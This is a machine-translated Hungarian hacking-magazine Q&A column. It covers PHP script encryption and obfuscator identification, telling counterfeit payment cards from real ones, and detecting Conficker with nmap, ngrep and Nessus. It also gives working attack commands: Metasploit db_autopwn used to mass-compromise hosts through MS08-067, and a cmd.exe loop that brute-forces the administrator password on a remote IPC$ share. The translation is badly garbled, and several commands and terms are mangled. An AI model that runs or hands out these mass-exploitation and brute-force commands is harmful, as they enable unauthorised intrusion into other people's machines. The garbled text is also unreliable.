Easy-hack - Saját cikkek - Kiadó - zonahaka-all hacker, hacker, xaker

Célkitűzés: titkosítása PHP-script kód
döntés

Van felsorolt ​​néhány népszerű projektek. Tény, hogy ezek a termékek sokkal több, és a keresési segít a www.google.com :).
Most tekintsük az eljárást, hogy elrejtse a tartalmát a PHP-script www.zorex.info online szolgáltatás:

1. Vegye ki a script kódot, hogy meg kell bitsorkódolják. Például:

2. lépés helyén www.zorex.info online szolgáltatás.
3. Válassza a «Zorex PHP CryptZ» service menüt, és kattintson a linkre.
4. Töltsük a következő területeken:
Forrás fájl // a php script
Decoder Fájlnév // A fájl neve dekóder
Nyomtató Zip // archívum az eredmény (a script + dekóder)
Limit Host // korlátozását a fogadó
Korlátozza az IP // korlátozás IP

5. Hit cipó, és kap egy linket a archívumba titkosított script.
6. Az archívum kibontása, azt látjuk, a belsejében a két fájlt:
nash_skript.php;
dekoder_dlya_nashego_skripta.php.

7. Nyissa nash_skript.php és ellenőrizze kriptovat kód:

script segítségével kódolják

Mint látható, minden tisztességes.

8. És végül - teszt dekóder.

Azt példaként a csak egy a sok online szolgáltatások a titkosítási kódot a PHP-script. A választás függ a személyes preferencia, és az algoritmus követelményeknek.
Célkitűzés: Annak vizsgálata, az álcázás, amely titkosított PHP-script
döntés

Nemrégiben volt egy nagy számú különböző futófelület obfuscators és a PHP-kódot. még nehezebb megérteni, mint azt rántotta egy script minden alkalommal: gyakran helyreállítása sorets - könnyebb, mint hogy milyen típusú az álcázás. Ezért fogjuk használni egy speciális segédprogramot, amit PCL azon PHPiD, tökéletesen alkalmas a célra. A program célja, hogy meghatározza és a védő obfuscators PHP-kódot, és képes felismerni 20 különböző algoritmusok, többek között:
meghatározott protektorok
TrueBug PHP Encoder 1.0.2 (incl. GZIP) 1.0.3 / 1.0.4
NuSphere NuCoder
Zend Encoder / Zend SafeGuard Suite
ByteRun Protector for PHP
SourceCop (incl. Protection modul)
Codelock (incl. Protection modul)
SourceGuardian PHP
PHPCipher
phpSHIELD
CNCrypto
PHTML Encoder
ioncube PHP Encoder
PHP LockIt! 1.8, 2.0 (incl. GZIP)
Obfusc (Basic / Normál, ShowObfuscate)
Zorex PHP CryptZ (incl. Protection modul)
gencoder
DWebEncoder
Free PHP Encoder
PHP Compact
TrueBug PHP álcázás 1.1
PHPCoder / eAccelerator
meghatározott obfuscators
Szemantikus Designs álcázás
PHP Defender
PHP LockIt! (Ködösítés mód)
Raizlabs PHP álcázás
POBS - PHP álcázás

Tekintsük a részletes műveletsornak hogy megoldja a problémát:
Merge közművek PCL azon PHPiD a mi DVD.
Fuss ehe'shnik phpid.exe.
Kiválasztása rántotta egy script, például:

4. A tulzy az eredmény: a Free PHP Encoder - www.freephpencoder.com. Ennek megfelelően, a feladat befejezése: Protector sikeresen definiált és sorets emelje fel a forgatókönyvet maga :).

Ui Ne feledje, hogy a méret a vizsgált script közművek nem haladhatja meg a 1 méter, vagy a funkció nem garantált.
Célkitűzés: megkülönböztetni a VISA / MASTERCARD hamis kártyát az eredeti
döntés

Fizetési terminálok és ATM-ek már nem éri meg, kivéve a kukorica standokon. Megmondom, hogyan lehet megkülönböztetni a bal az eredeti hitelkártya. Ehhez én már összeállított egy kis listát a jellegzetes. Irányított őket, akkor azonosítani hamis könnyen:
Tudjon mikronyomat körül VISA logó. Ha már majdnem olvashatatlan és törli a kártya - biztos, mielőtt a baloldali!
A következő fontos részlet - a hologram. eredeti hologram háttér tiszta, egy tükör, és a kép részleteit könnyen megkülönböztethetőek. A fő jellemzője a hamisított hologramok - a hangerő hiánya. Ezen kívül a „bal” hologram könnyen lehámlik (általában egy egyszerű matrica). Valódi hologram lehetetlen ledönteni egy szöget, vagy letép egy hitelkártya más módon.
Nézd meg a szalagot az aláírás a hátoldalon a kártya. Az eredeti szalagot a legtöbb esetben van háttér a felirat «MasterCard» vagy «Visa» (attól függően, hogy a kártya típusa). Ezen túlmenően, a szalagot kell helyezni a kártya számát és a biztonsági kódot.
Néha hamisítványok használt laminált mindkét oldalán bevont - ez átlátszó fólia könnyen lehúzható a széleken, különösen, ha ő egy kis segítség.
Az első négy számjegy a kártya számát (BIN), duplikált kontrasztos színű lehet kitörölni egy hamis kártyát. BIN az eredeti nem lehet törölni!
Érdemes odafigyelni, hogy a szimbólumok «V» és „MS” (a megfelelő típusú kártyák). Ezek eltérnek a normál vastagság / szélesség.
B ultraibolya fény különleges képek lehetnek jelen a hamisított kártyákkal (például egy repülő galamb VISA kártyával). Valószínűleg a kép homályos, vagy lesz, vagy nem lesz egyáltalán.
Az adatok függvényében a kártyán meg kell egyeznie az adatok letétbe a mágneses csík!

Ön bizonyára nem csak szembe a problémát, hogy a cirill karaktereket az utat, hogy a profil a számla (emlékszik görbe dolgozó Metasploit keret a „Rendszergazda” fiók). Normális átnevezni azt a fiókot nem működik - kellett másolni a szükséges könyvtárakat, és regisztrálja azokat manuálisan módon.

Végül - egy megjegyzés. Uchetki másolja a profilt, amely alatt ülsz, akkor nem. Be kell menni más a csoport „Rendszergazdák”, és másolja onnan.
Célkitűzés: A közelmúltban, a híres trójai Conficker (ru.wikipedia.org/wiki/Conficker) fertőzött egy csomó autó, és mindannyian bazhnye. Hogyan lehet azonosítani őket?
döntés

1. Megközelítés keresztül NMAP. Határozza meg a féreg lehet szkennelni ugyanazon az alhálózaton. Hasznos egyedi script írt NMAP SE - ő már ismertetett korábbi számai. Ez történik a következő parancsot:

nmap -PN -T4 -p139,445 -N -v --script = SMB-check-vulns --script-args safe = 1 192.168.111.0/24,

ahol
script - amely jelzi, hogy fellebbezni a forgatókönyvet, amely már a legújabb verzió NMAP (Nmap 4.85BETA7).
pn - letiltja a Domain Name Resolution (DNR).
N - letiltja a csekket „élénksége” a fogadó.

Letiltása a fenti lehetőségek jelentősen növeli szkennelési sebesség. A nagy léptékű hálózatok a következő parancsot:

nmap -SC -PN -d -p445 -n -T4 --min-gépcsoport 256 --min-párhuzamosság 64 --script = SMB-check-vulns --script-args = safe = 1 10.0.0.0/8

Természete miatt a biztonsági rés szkenner ajánlott play off 139 és 445 TCP portot. A vizsgálat eredményeit talál bejegyzések «Conficker: Valószínűleg CLEAN» vagy «Conficker: Valószínűleg FERTŐZÖTT».

2. A megközelítést nGREP. Ngrep alkalmassága nagyon gazdag, például lehetővé teszi, hogy futtatni a forgalom értékét a keresést rakományának (azaz információ, hogy tárolja a hálózati csomagok az adatok). Az aláírás Conficker megtalálható szinte az összes modern levéltár és információbiztonság blogok - akkor is biztonságosan használható:

ngrep -qd eth0 -W egyetlen -s 900 X

0b0b4feebeb „tcp port 445

és dst nettó 127.0.208.0/24 "

Először is meg kell promonitorit hálózati tevékenységet és nyilvántartja a részét a forgalom szippantás, majd táplálja a lerakó ngrep'u.

3. módszer segítségével Nessus. Népszerű szkenner is nem lesz felesleges. Van egy speciális plug-in (nessus.org/plugins/index.php?view=singleid=36036), amely lehetővé teszi, hogy megszabaduljon az összes állomását, és azonosítani az áldozatot. Többek között hívta „áldozat” nem lehet, mert a becslések CVSSv2 mutatókat, a Conficker egy „kritikus” kár szintjét (Kritikus / CVSS alappontszám. 10,0). Azonosításához szükséges hajtsa végre a következő lépéseket:

nessus leolvasási megfelelően van konfigurálva, hogy kap egy professzionális takarmány

b) keresünk egy plug-on szám 36036 és alkalmazni.

4. A megközelítés a segédprogram Computer Technology Institute Bonn.

a) Töltse a figyelemre méltó hálózati segédprogram célja csak erre a célra. Letölthető itt - iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.

b) Futtasd a $ ./scs2.py 10.0.0.1 10.0.0.5

[Ismeretlen] 10.0.0.1: Nincs válasz port 445 / TCP.

[Ismeretlen] 10.0.0.2: nem futtatható NetpwPathCanonicalize.

5. Pars eredményeket.
Probléma: Hogyan kell használni Metasploit szervezni massruting?
döntés

Semmi illetlen :). Massruting - tömeges fertőzött gépek egy ismert (vagy ismeretlen) biztonsági réseket. Ha korábban ehhez a művelethez a szervezetnek kell írni Tuyev huchu scriptek, akkor Metasploit mindent könnyebbé vált. Csak meg kell, hogy kövesse néhány lépést.

1. támogatja a Georgia sqlite3 adatbázis:

MSF> terhelés db_sqlite3 [*] Sikeresen betöltött plugin: db_sqlite3

2. inicializálása létrehozása egy új adatbázis:

MSF> db_create [*] A megadott adatbázis már létezik, amely összeköti [*] Sikeresen kapcsolódik az adatbázishoz [*] Fájl: /root/.msf3/sqlite3.db

Fel kell gyorsítani tesztjeink használja a beépített modul NMAP'a a hálózaton tartomány:

MSF> db_nmap -sS -PS445 -p445 -n -T Agresszív AAA.BBB.CCC.0 / 24

3. Ez a végjáték - fut massruting a sérülékenység MS08-067:

MSF> db_autopwn -e -p -b -m ms08_067

Ui Hogy adatokat gyűjtsön a tevékenység a kapott Shell vezet egy csapat msf> ülés -l.
Célkitűzés: szervez szótár támadás egy jelszóval védett megosztott erőforrások
döntés

1. összeállít egy szótár támadás. Tegyük fel, hogy ez egy szöveges dokumentum 100 szót, soronként egyet. Nevezzük passwords.txt.

2. Már a cmd.exe parancssorba írja be a következő parancsot.

FOR / F "jelzőt = 1 *" % i in (passwords.txt) do net use # 92; # 92; # 92 192.168.1.1; IPC $% i / u: Adminisztrátor

3. Örüljetek gyors felsorolás folyamatot.

Ui A módszer lényeges csak a támadás a rendszergazda jelszavát. Segítségével brute force más bejelentkezési azonnal vezet blokkolja a számla.